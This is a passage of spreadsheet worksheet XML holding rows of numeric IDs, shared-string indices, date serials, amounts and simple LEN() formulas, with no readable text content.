        <v>180000</v>
      </c>
      <c r="I1511" t="s">
        <v>9550</v>
      </c>
      <c r="K1511">
        <f>LEN(I1511)</f>
        <v>18</v>
      </c>
      <c r="L1511">
        <f>LEN(J1511)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1512" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1512">
        <v>21050</v>
      </c>
      <c r="B1512">
        <v>2578</v>
      </c>
      <c r="C1512" t="s">
        <v>5120</v>
      </c>
      <c r="D1512" t="s">
        <v>11115</v>
      </c>
      <c r="E1512">
        <v>34</v>
      </c>
      <c r="F1512" t="s">
        <v>11116</v>
      </c>
      <c r="G1512" s="1">
        <v>44351</v>
      </c>
      <c r="H1512">
        <v>120000</v>
      </c>
      <c r="I1512" t="s">
        <v>9550</v>
      </c>
      <c r="K1512">
        <f>LEN(I1512)</f>
        <v>18</v>
      </c>
      <c r="L1512">
        <f>LEN(J1512)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1513" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1513">
        <v>21055</v>
      </c>
      <c r="B1513">
        <v>2578</v>
      </c>
      <c r="C1513" t="s">
        <v>16385</v>
      </c>
      <c r="D1513" t="s">
        <v>16386</v>
      </c>
      <c r="E1513">
        <v>34</v>
      </c>
      <c r="F1513" t="s">
        <v>11117</v>
      </c>
      <c r="G1513" s="1">
        <v>44351</v>
      </c>
      <c r="H1513" s="4">
        <v>12000</v>
      </c>
      <c r="I1513" t="s">
        <v>9550</v>
      </c>
      <c r="K1513">
        <f>LEN(I1513)</f>
        <v>18</v>
      </c>
      <c r="L1513">
        <f>LEN(J1513)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1514" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1514">
        <v>21093</v>
      </c>
      <c r="B1514">
        <v>604</v>
      </c>
      <c r="C1514" t="s">
        <v>1503</v>
      </c>
      <c r="D1514" t="s">
        <v>11132</v>
      </c>
      <c r="E1514">
        <v>27</v>
      </c>
      <c r="F1514" t="s">
        <v>1746</v>
      </c>
      <c r="G1514" s="1">
        <v>44005</v>
      </c>
      <c r="H1514">
        <v>16546</v>
      </c>
      <c r="I1514" t="s">
        <v>9952</v>
      </c>
      <c r="K1514">
        <f>LEN(I1514)</f>
        <v>18</v>
      </c>
      <c r="L1514">
        <f>LEN(J1514)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1515" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1515">
        <v>21328</v>
      </c>
      <c r="B1515">
        <v>4798</v>
      </c>
      <c r="C1515" t="s">
        <v>7183</v>
      </c>
      <c r="D1515" t="s">
        <v>11310</v>
      </c>
      <c r="E1515">
        <v>11</v>
      </c>
      <c r="F1515" t="s">
        <v>9676</v>
      </c>
      <c r="G1515" s="1">
        <v>44034</v>
      </c>
      <c r="H1515">
        <v>1000</v>
      </c>
      <c r="I1515" t="s">
        <v>9550</v>
      </c>
      <c r="K1515">
        <f>LEN(I1515)</f>
        <v>18</v>
      </c>
      <c r="L1515">
        <f>LEN(J1515)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1516" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1516">
        <v>21330</v>
      </c>
      <c r="B1516">
        <v>4798</v>
      </c>
      <c r="C1516" t="s">
        <v>7183</v>
      </c>
      <c r="D1516" t="s">
        <v>11310</v>
      </c>
      <c r="E1516">
        <v>11</v>
      </c>
      <c r="F1516" t="s">
        <v>11314</v>
      </c>
      <c r="G1516" s="1">
        <v>44034</v>
      </c>
      <c r="H1516">
        <v>1000</v>
      </c>
      <c r="I1516" t="s">
        <v>9550</v>
      </c>
      <c r="K1516">
        <f>LEN(I1516)</f>
        <v>18</v>
      </c>
      <c r="L1516">
        <f>LEN(J1516)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1517" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1517">
        <v>21334</v>
      </c>
      <c r="B1517">
        <v>4798</v>
      </c>
      <c r="C1517" t="s">
        <v>7183</v>
      </c>
      <c r="D1517" t="s">
        <v>11310</v>
      </c>
      <c r="E1517">
        <v>11</v>
      </c>
      <c r="F1517" t="s">
        <v>11215</v>
      </c>
      <c r="G1517" s="1">
        <v>44034</v>
      </c>
      <c r="H1517">
        <v>1000</v>
      </c>
      <c r="I1517" t="s">
        <v>9550</v>
      </c>
      <c r="K1517">
        <f>LEN(I1517)</f>
        <v>18</v>
      </c>
      <c r="L1517">
        <f>LEN(J1517)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1518" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1518">
        <v>21371</v>
      </c>
      <c r="B1518">
        <v>469</v>
      </c>
      <c r="C1518" t="s">
        <v>1626</v>
      </c>
      <c r="D1518" t="s">
        <v>11336</v>
      </c>
      <c r="E1518">
        <v>12</v>
      </c>
      <c r="F1518" t="s">
        <v>11341</v>
      </c>
      <c r="G1518" s="1">
        <v>44075</v>
      </c>
      <c r="H1518">
        <v>50000</v>
      </c>
      <c r="I1518" t="s">
        <v>9550</v>
      </c>
      <c r="K1518">
        <f>LEN(I1518)</f>
        <v>18</v>
      </c>
      <c r="L1518">
        <f>LEN(J1518)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1519" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1519">
        <v>19772</v>
      </c>
      <c r="B1519">
        <v>2546</v>
      </c>
      <c r="C1519" t="s">
        <v>5339</v>
      </c>
      <c r="D1519" t="s">
        <v>10229</v>
      </c>
      <c r="E1519">
        <v>5</v>
      </c>
      <c r="F1519" t="s">
        <v>10230</v>
      </c>
      <c r="G1519" s="1">
        <v>43896</v>
      </c>
      <c r="H1519">
        <v>100000</v>
      </c>
      <c r="I1519" t="s">
        <v>10231</v>
      </c>
      <c r="K1519">
        <f>LEN(I1519)</f>
        <v>17</v>
      </c>
      <c r="L1519">
        <f>LEN(J1519)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1520" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1520">
        <v>19774</v>
      </c>
      <c r="B1520">
        <v>2546</v>
      </c>
      <c r="C1520" t="s">
        <v>5339</v>
      </c>
      <c r="D1520" t="s">
        <v>10229</v>
      </c>
      <c r="E1520">
        <v>5</v>
      </c>
      <c r="F1520" t="s">
        <v>10232</v>
      </c>
      <c r="G1520" s="1">
        <v>43896</v>
      </c>
      <c r="H1520">
        <v>15000</v>
      </c>
      <c r="I1520" t="s">
        <v>10231</v>
      </c>
      <c r="K1520">
        <f>LEN(I1520)</f>
        <v>17</v>
      </c>
      <c r="L1520">
        <f>LEN(J1520)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1521" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1521">
        <v>19422</v>
      </c>
      <c r="B1521">
        <v>2569</v>
      </c>
      <c r="C1521" t="s">
        <v>5086</v>
      </c>
      <c r="D1521" t="s">
        <v>10023</v>
      </c>
      <c r="E1521">
        <v>11</v>
      </c>
      <c r="F1521" t="s">
        <v>1016</v>
      </c>
      <c r="G1521" s="1">
        <v>43873</v>
      </c>
      <c r="H1521">
        <v>3500</v>
      </c>
      <c r="I1521" t="s">
        <v>10024</v>
      </c>
      <c r="K1521">
        <f>LEN(I1521)</f>
        <v>16</v>
      </c>
      <c r="L1521">
        <f>LEN(J1521)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1522" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1522">
        <v>16696</v>
      </c>
      <c r="B1522">
        <v>2178</v>
      </c>
      <c r="C1522" t="s">
        <v>5039</v>
      </c>
      <c r="D1522" t="s">
        <v>9468</v>
      </c>
      <c r="E1522">
        <v>16</v>
      </c>
      <c r="F1522" t="s">
        <v>9474</v>
      </c>
      <c r="G1522" s="1">
        <v>43847</v>
      </c>
      <c r="H1522">
        <v>2000</v>
      </c>
      <c r="I1522" t="s">
        <v>9475</v>
      </c>
      <c r="K1522">
        <f>LEN(I1522)</f>
        <v>15</v>
      </c>
      <c r="L1522">
        <f>LEN(J1522)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1523" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1523">
        <v>16634</v>
      </c>
      <c r="B1523">
        <v>2245</v>
      </c>
      <c r="C1523" t="s">
        <v>6132</v>
      </c>
      <c r="D1523" t="s">
        <v>9434</v>
      </c>
      <c r="E1523">
        <v>11</v>
      </c>
      <c r="F1523" t="s">
        <v>9435</v>
      </c>
      <c r="G1523" s="1">
        <v>43923</v>
      </c>
      <c r="H1523">
        <v>0</v>
      </c>
      <c r="I1523" t="s">
        <v>9436</v>
      </c>
      <c r="K1523">
        <f>LEN(I1523)</f>
        <v>14</v>
      </c>
      <c r="L1523">
        <f>LEN(J1523)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1524" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1524">
        <v>16635</v>
      </c>
      <c r="B1524">
        <v>2245</v>
      </c>
      <c r="C1524" t="s">
        <v>6132</v>
      </c>
      <c r="D1524" t="s">
        <v>9434</v>
      </c>
      <c r="E1524">
        <v>11</v>
      </c>
      <c r="F1524" t="s">
        <v>9437</v>
      </c>
      <c r="G1524" s="1">
        <v>43923</v>
      </c>
      <c r="H1524">
        <v>0</v>
      </c>
      <c r="I1524" t="s">
        <v>9436</v>
      </c>
      <c r="K1524">
        <f>LEN(I1524)</f>
        <v>14</v>
      </c>
      <c r="L1524">
        <f>LEN(J1524)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1525" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1525">
        <v>16638</v>
      </c>
      <c r="B1525">
        <v>681</v>
      </c>
      <c r="C1525" t="s">
        <v>1571</v>
      </c>
      <c r="D1525" t="s">
        <v>9439</v>
      </c>
      <c r="E1525">
        <v>11</v>
      </c>
      <c r="F1525" t="s">
        <v>9435</v>
      </c>
      <c r="G1525" s="1">
        <v>43923</v>
      </c>
      <c r="H1525">
        <v>0</v>
      </c>
      <c r="I1525" t="s">
        <v>9436</v>
      </c>
      <c r="K1525">
        <f>LEN(I1525)</f>
        <v>14</v>
      </c>
      <c r="L1525">
        <f>LEN(J1525)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1526" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1526">
        <v>17373</v>
      </c>
      <c r="B1526">
        <v>2064</v>
      </c>
      <c r="C1526" t="s">
        <v>6736</v>
      </c>
      <c r="D1526" t="s">
        <v>9779</v>
      </c>
      <c r="E1526">
        <v>11</v>
      </c>
      <c r="F1526" t="s">
        <v>9780</v>
      </c>
      <c r="G1526" s="1">
        <v>43859</v>
      </c>
      <c r="H1526">
        <v>0</v>
      </c>
      <c r="I1526" t="s">
        <v>9436</v>
      </c>
      <c r="K1526">
        <f>LEN(I1526)</f>
        <v>14</v>
      </c>
      <c r="L1526">
        <f>LEN(J1526)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1527" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1527">
        <v>17475</v>
      </c>
      <c r="B1527">
        <v>2051</v>
      </c>
      <c r="C1527" t="s">
        <v>5476</v>
      </c>
      <c r="D1527" t="s">
        <v>9793</v>
      </c>
      <c r="E1527">
        <v>16</v>
      </c>
      <c r="F1527" t="s">
        <v>9798</v>
      </c>
      <c r="G1527" s="1">
        <v>43871</v>
      </c>
      <c r="H1527">
        <v>60000</v>
      </c>
      <c r="I1527" t="s">
        <v>9799</v>
      </c>
      <c r="K1527">
        <f>LEN(I1527)</f>
        <v>14</v>
      </c>
      <c r="L1527">
        <f>LEN(J1527)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1528" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1528">
        <v>19384</v>
      </c>
      <c r="B1528">
        <v>364</v>
      </c>
      <c r="C1528" t="s">
        <v>372</v>
      </c>
      <c r="D1528" t="s">
        <v>9982</v>
      </c>
      <c r="E1528">
        <v>16</v>
      </c>
      <c r="F1528" t="s">
        <v>9983</v>
      </c>
      <c r="G1528" s="1">
        <v>43937</v>
      </c>
      <c r="H1528">
        <v>1000000</v>
      </c>
      <c r="I1528" t="s">
        <v>9984</v>
      </c>
      <c r="K1528">
        <f>LEN(I1528)</f>
        <v>14</v>
      </c>
      <c r="L1528">
        <f>LEN(J1528)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1529" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1529">
        <v>19794</v>
      </c>
      <c r="B1529">
        <v>2598</v>
      </c>
      <c r="C1529" t="s">
        <v>5345</v>
      </c>
      <c r="D1529" t="s">
        <v>10239</v>
      </c>
      <c r="E1529">
        <v>23</v>
      </c>
      <c r="F1529" t="s">
        <v>10240</v>
      </c>
      <c r="G1529" s="1">
        <v>43888</v>
      </c>
      <c r="H1529">
        <v>384</v>
      </c>
      <c r="I1529" t="s">
        <v>10241</v>
      </c>
      <c r="K1529">
        <f>LEN(I1529)</f>
        <v>14</v>
      </c>
      <c r="L1529">
        <f>LEN(J1529)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1530" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1530">
        <v>19795</v>
      </c>
      <c r="B1530">
        <v>2598</v>
      </c>
      <c r="C1530" t="s">
        <v>5345</v>
      </c>
      <c r="D1530" t="s">
        <v>10239</v>
      </c>
      <c r="E1530">
        <v>23</v>
      </c>
      <c r="F1530" t="s">
        <v>1276</v>
      </c>
      <c r="G1530" s="1">
        <v>43888</v>
      </c>
      <c r="H1530">
        <v>1296</v>
      </c>
      <c r="I1530" t="s">
        <v>10241</v>
      </c>
      <c r="K1530">
        <f>LEN(I1530)</f>
        <v>14</v>
      </c>
      <c r="L1530">
        <f>LEN(J1530)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1531" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1531">
        <v>19989</v>
      </c>
      <c r="B1531">
        <v>2601</v>
      </c>
      <c r="C1531" t="s">
        <v>5551</v>
      </c>
      <c r="D1531" t="s">
        <v>10383</v>
      </c>
      <c r="E1531">
        <v>23</v>
      </c>
      <c r="F1531" t="s">
        <v>1276</v>
      </c>
      <c r="G1531" s="1">
        <v>44088</v>
      </c>
      <c r="H1531">
        <v>500</v>
      </c>
      <c r="I1531" t="s">
        <v>10241</v>
      </c>
      <c r="K1531">
        <f>LEN(I1531)</f>
        <v>14</v>
      </c>
      <c r="L1531">
        <f>LEN(J1531)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1532" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1532">
        <v>19990</v>
      </c>
      <c r="B1532">
        <v>2601</v>
      </c>
      <c r="C1532" t="s">
        <v>5551</v>
      </c>
      <c r="D1532" t="s">
        <v>10383</v>
      </c>
      <c r="E1532">
        <v>23</v>
      </c>
      <c r="F1532" t="s">
        <v>8496</v>
      </c>
      <c r="G1532" s="1">
        <v>44088</v>
      </c>
      <c r="H1532">
        <v>100</v>
      </c>
      <c r="I1532" t="s">
        <v>10241</v>
      </c>
      <c r="K1532">
        <f>LEN(I1532)</f>
        <v>14</v>
      </c>
      <c r="L1532">
        <f>LEN(J1532)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1533" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1533">
        <v>19991</v>
      </c>
      <c r="B1533">
        <v>2601</v>
      </c>
      <c r="C1533" t="s">
        <v>5551</v>
      </c>
      <c r="D1533" t="s">
        <v>10383</v>
      </c>
      <c r="E1533">
        <v>23</v>
      </c>
      <c r="F1533" t="s">
        <v>10384</v>
      </c>
      <c r="G1533" s="1">
        <v>44088</v>
      </c>
      <c r="H1533">
        <v>100</v>
      </c>
      <c r="I1533" t="s">
        <v>10241</v>
      </c>
      <c r="K1533">
        <f>LEN(I1533)</f>
        <v>14</v>
      </c>
      <c r="L1533">
        <f>LEN(J1533)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1534" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1534">
        <v>20063</v>
      </c>
      <c r="B1534">
        <v>2639</v>
      </c>
      <c r="C1534" t="s">
        <v>5629</v>
      </c>
      <c r="D1534" t="s">
        <v>10447</v>
      </c>
      <c r="E1534">
        <v>9</v>
      </c>
      <c r="F1534" t="s">
        <v>5631</v>
      </c>
      <c r="G1534" s="1">
        <v>43882</v>
      </c>
      <c r="H1534">
        <v>3600</v>
      </c>
      <c r="I1534" t="s">
        <v>10448</v>
      </c>
      <c r="K1534">
        <f>LEN(I1534)</f>
        <v>14</v>
      </c>
      <c r="L1534">
        <f>LEN(J1534)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1535" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1535">
        <v>20829</v>
      </c>
      <c r="B1535">
        <v>645</v>
      </c>
      <c r="C1535" t="s">
        <v>1274</v>
      </c>
      <c r="D1535" t="s">
        <v>11014</v>
      </c>
      <c r="E1535">
        <v>23</v>
      </c>
      <c r="F1535" t="s">
        <v>1276</v>
      </c>
      <c r="G1535" s="1">
        <v>43970</v>
      </c>
      <c r="H1535">
        <v>6000</v>
      </c>
      <c r="I1535" t="s">
        <v>10241</v>
      </c>
      <c r="K1535">
        <f>LEN(I1535)</f>
        <v>14</v>
      </c>
      <c r="L1535">
        <f>LEN(J1535)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1536" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1536">
        <v>20901</v>
      </c>
      <c r="B1536">
        <v>2785</v>
      </c>
      <c r="C1536" t="s">
        <v>7018</v>
      </c>
      <c r="D1536" t="s">
        <v>11050</v>
      </c>
      <c r="E1536">
        <v>23</v>
      </c>
      <c r="F1536" t="s">
        <v>11051</v>
      </c>
      <c r="G1536" s="1">
        <v>43994</v>
      </c>
      <c r="H1536">
        <v>600</v>
      </c>
      <c r="I1536" t="s">
        <v>10241</v>
      </c>
      <c r="K1536">
        <f>LEN(I1536)</f>
        <v>14</v>
      </c>
      <c r="L1536">
        <f>LEN(J1536)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1537" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1537">
        <v>20902</v>
      </c>
      <c r="B1537">
        <v>2785</v>
      </c>
      <c r="C1537" t="s">
        <v>7018</v>
      </c>
      <c r="D1537" t="s">
        <v>11050</v>
      </c>
      <c r="E1537">
        <v>23</v>
      </c>
      <c r="F1537" t="s">
        <v>9929</v>
      </c>
      <c r="G1537" s="1">
        <v>43994</v>
      </c>
      <c r="H1537">
        <v>1200</v>
      </c>
      <c r="I1537" t="s">
        <v>10241</v>
      </c>
      <c r="K1537">
        <f>LEN(I1537)</f>
        <v>14</v>
      </c>
      <c r="L1537">
        <f>LEN(J1537)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1538" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1538">
        <v>20903</v>
      </c>
      <c r="B1538">
        <v>2785</v>
      </c>
      <c r="C1538" t="s">
        <v>7018</v>
      </c>
      <c r="D1538" t="s">
        <v>11050</v>
      </c>
      <c r="E1538">
        <v>23</v>
      </c>
      <c r="F1538" t="s">
        <v>8230</v>
      </c>
      <c r="G1538" s="1">
        <v>43994</v>
      </c>
      <c r="H1538">
        <v>600</v>
      </c>
      <c r="I1538" t="s">
        <v>10241</v>
      </c>
      <c r="K1538">
        <f>LEN(I1538)</f>
        <v>14</v>
      </c>
      <c r="L1538">
        <f>LEN(J1538)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1539" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1539">
        <v>16852</v>
      </c>
      <c r="B1539">
        <v>2157</v>
      </c>
      <c r="C1539" t="s">
        <v>4725</v>
      </c>
      <c r="D1539" t="s">
        <v>9520</v>
      </c>
      <c r="E1539">
        <v>12</v>
      </c>
      <c r="F1539" t="s">
        <v>9521</v>
      </c>
      <c r="G1539" s="1">
        <v>43861</v>
      </c>
      <c r="H1539">
        <v>24000</v>
      </c>
      <c r="I1539" t="s">
        <v>9522</v>
      </c>
      <c r="K1539">
        <f>LEN(I1539)</f>
        <v>13</v>
      </c>
      <c r="L1539">
        <f>LEN(J1539)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1540" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1540">
        <v>16853</v>
      </c>
      <c r="B1540">
        <v>2157</v>
      </c>
      <c r="C1540" t="s">
        <v>4725</v>
      </c>
      <c r="D1540" t="s">
        <v>9520</v>
      </c>
      <c r="E1540">
        <v>12</v>
      </c>
      <c r="F1540" t="s">
        <v>1746</v>
      </c>
      <c r="G1540" s="1">
        <v>43861</v>
      </c>
      <c r="H1540">
        <v>2400</v>
      </c>
      <c r="I1540" t="s">
        <v>9522</v>
      </c>
      <c r="K1540">
        <f>LEN(I1540)</f>
        <v>13</v>
      </c>
      <c r="L1540">
        <f>LEN(J1540)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1541" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1541">
        <v>16854</v>
      </c>
      <c r="B1541">
        <v>2157</v>
      </c>
      <c r="C1541" t="s">
        <v>4725</v>
      </c>
      <c r="D1541" t="s">
        <v>9520</v>
      </c>
      <c r="E1541">
        <v>12</v>
      </c>
      <c r="F1541" t="s">
        <v>9523</v>
      </c>
      <c r="G1541" s="1">
        <v>43861</v>
      </c>
      <c r="H1541">
        <v>2400</v>
      </c>
      <c r="I1541" t="s">
        <v>9522</v>
      </c>
      <c r="K1541">
        <f>LEN(I1541)</f>
        <v>13</v>
      </c>
      <c r="L1541">
        <f>LEN(J1541)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1542" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1542">
        <v>17258</v>
      </c>
      <c r="B1542">
        <v>2268</v>
      </c>
      <c r="C1542" t="s">
        <v>6789</v>
      </c>
      <c r="D1542" t="s">
        <v>9745</v>
      </c>
      <c r="E1542">
        <v>18</v>
      </c>
      <c r="F1542" t="s">
        <v>3763</v>
      </c>
      <c r="G1542" s="1">
        <v>43853</v>
      </c>
      <c r="H1542">
        <v>1000</v>
      </c>
      <c r="I1542" t="s">
        <v>9746</v>
      </c>
      <c r="K1542">
        <f>LEN(I1542)</f>
        <v>13</v>
      </c>
      <c r="L1542">
        <f>LEN(J1542)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1543" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1543">
        <v>17259</v>
      </c>
      <c r="B1543">
        <v>2268</v>
      </c>
      <c r="C1543" t="s">
        <v>6789</v>
      </c>
      <c r="D1543" t="s">
        <v>9745</v>
      </c>
      <c r="E1543">
        <v>18</v>
      </c>
      <c r="F1543" t="s">
        <v>6917</v>
      </c>
      <c r="G1543" s="1">
        <v>43853</v>
      </c>
      <c r="H1543">
        <v>1000</v>
      </c>
      <c r="I1543" t="s">
        <v>9746</v>
      </c>
      <c r="K1543">
        <f>LEN(I1543)</f>
        <v>13</v>
      </c>
      <c r="L1543">
        <f>LEN(J1543)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1544" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1544">
        <v>17260</v>
      </c>
      <c r="B1544">
        <v>2268</v>
      </c>
      <c r="C1544" t="s">
        <v>6789</v>
      </c>
      <c r="D1544" t="s">
        <v>9745</v>
      </c>
      <c r="E1544">
        <v>18</v>
      </c>
      <c r="F1544" t="s">
        <v>2236</v>
      </c>
      <c r="G1544" s="1">
        <v>43853</v>
      </c>
      <c r="H1544">
        <v>10000</v>
      </c>
      <c r="I1544" t="s">
        <v>9746</v>
      </c>
      <c r="K1544">
        <f>LEN(I1544)</f>
        <v>13</v>
      </c>
      <c r="L1544">
        <f>LEN(J1544)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1545" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1545">
        <v>17261</v>
      </c>
      <c r="B1545">
        <v>2268</v>
      </c>
      <c r="C1545" t="s">
        <v>6789</v>
      </c>
      <c r="D1545" t="s">
        <v>9745</v>
      </c>
      <c r="E1545">
        <v>18</v>
      </c>
      <c r="F1545" t="s">
        <v>4686</v>
      </c>
      <c r="G1545" s="1">
        <v>43853</v>
      </c>
      <c r="H1545">
        <v>30000</v>
      </c>
      <c r="I1545" t="s">
        <v>9746</v>
      </c>
      <c r="K1545">
        <f>LEN(I1545)</f>
        <v>13</v>
      </c>
      <c r="L1545">
        <f>LEN(J1545)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1546" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1546">
        <v>17262</v>
      </c>
      <c r="B1546">
        <v>2268</v>
      </c>
      <c r="C1546" t="s">
        <v>6789</v>
      </c>
      <c r="D1546" t="s">
        <v>9745</v>
      </c>
      <c r="E1546">
        <v>18</v>
      </c>
      <c r="F1546" t="s">
        <v>9586</v>
      </c>
      <c r="G1546" s="1">
        <v>43853</v>
      </c>
      <c r="H1546">
        <v>2000</v>
      </c>
      <c r="I1546" t="s">
        <v>9746</v>
      </c>
      <c r="K1546">
        <f>LEN(I1546)</f>
        <v>13</v>
      </c>
      <c r="L1546">
        <f>LEN(J1546)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1547" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1547">
        <v>17263</v>
      </c>
      <c r="B1547">
        <v>2268</v>
      </c>
      <c r="C1547" t="s">
        <v>6789</v>
      </c>
      <c r="D1547" t="s">
        <v>9745</v>
      </c>
      <c r="E1547">
        <v>18</v>
      </c>
      <c r="F1547" t="s">
        <v>9585</v>
      </c>
      <c r="G1547" s="1">
        <v>43853</v>
      </c>
      <c r="H1547">
        <v>2000</v>
      </c>
      <c r="I1547" t="s">
        <v>9746</v>
      </c>
      <c r="K1547">
        <f>LEN(I1547)</f>
        <v>13</v>
      </c>
      <c r="L1547">
        <f>LEN(J1547)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1548" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1548">
        <v>17278</v>
      </c>
      <c r="B1548">
        <v>2268</v>
      </c>
      <c r="C1548" t="s">
        <v>6789</v>
      </c>
      <c r="D1548" t="s">
        <v>9745</v>
      </c>
      <c r="E1548">
        <v>18</v>
      </c>
      <c r="F1548" t="s">
        <v>9757</v>
      </c>
      <c r="G1548" s="1">
        <v>43853</v>
      </c>
      <c r="H1548">
        <v>2000</v>
      </c>
      <c r="I1548" t="s">
        <v>9746</v>
      </c>
      <c r="K1548">
        <f>LEN(I1548)</f>
        <v>13</v>
      </c>
      <c r="L1548">
        <f>LEN(J1548)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1549" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1549">
        <v>17452</v>
      </c>
      <c r="B1549">
        <v>2051</v>
      </c>
      <c r="C1549" t="s">
        <v>5476</v>
      </c>
      <c r="D1549" t="s">
        <v>9793</v>
      </c>
      <c r="E1549">
        <v>16</v>
      </c>
      <c r="F1549" t="s">
        <v>9794</v>
      </c>
      <c r="G1549" s="1">
        <v>43871</v>
      </c>
      <c r="H1549">
        <v>600000</v>
      </c>
      <c r="I1549" t="s">
        <v>9536</v>
      </c>
      <c r="K1549">
        <f>LEN(I1549)</f>
        <v>13</v>
      </c>
      <c r="L1549">
        <f>LEN(J1549)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1550" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1550">
        <v>17453</v>
      </c>
      <c r="B1550">
        <v>2051</v>
      </c>
      <c r="C1550" t="s">
        <v>5476</v>
      </c>
      <c r="D1550" t="s">
        <v>9793</v>
      </c>
      <c r="E1550">
        <v>16</v>
      </c>
      <c r="F1550" t="s">
        <v>9795</v>
      </c>
      <c r="G1550" s="1">
        <v>43871</v>
      </c>
      <c r="H1550">
        <v>60000</v>
      </c>
      <c r="I1550" t="s">
        <v>9536</v>
      </c>
      <c r="K1550">
        <f>LEN(I1550)</f>
        <v>13</v>
      </c>
      <c r="L1550">
        <f>LEN(J1550)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1551" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1551">
        <v>19388</v>
      </c>
      <c r="B1551">
        <v>949</v>
      </c>
      <c r="C1551" t="s">
        <v>2621</v>
      </c>
      <c r="D1551" t="s">
        <v>9987</v>
      </c>
      <c r="E1551">
        <v>17</v>
      </c>
      <c r="F1551" t="s">
        <v>9925</v>
      </c>
      <c r="G1551" s="1">
        <v>43909</v>
      </c>
      <c r="H1551">
        <v>100000</v>
      </c>
      <c r="I1551" t="s">
        <v>9746</v>
      </c>
      <c r="K1551">
        <f>LEN(I1551)</f>
        <v>13</v>
      </c>
      <c r="L1551">
        <f>LEN(J1551)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1552" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1552">
        <v>19392</v>
      </c>
      <c r="B1552">
        <v>2361</v>
      </c>
      <c r="C1552" t="s">
        <v>9997</v>
      </c>
      <c r="D1552" t="s">
        <v>9998</v>
      </c>
      <c r="E1552">
        <v>16</v>
      </c>
      <c r="F1552" t="s">
        <v>2236</v>
      </c>
      <c r="G1552" s="1">
        <v>43913</v>
      </c>
      <c r="H1552">
        <v>3000000</v>
      </c>
      <c r="I1552" t="s">
        <v>9536</v>
      </c>
      <c r="K1552">
        <f>LEN(I1552)</f>
        <v>13</v>
      </c>
      <c r="L1552">
        <f>LEN(J1552)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1553" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1553">
        <v>19409</v>
      </c>
      <c r="B1553">
        <v>2244</v>
      </c>
      <c r="C1553" t="s">
        <v>4940</v>
      </c>
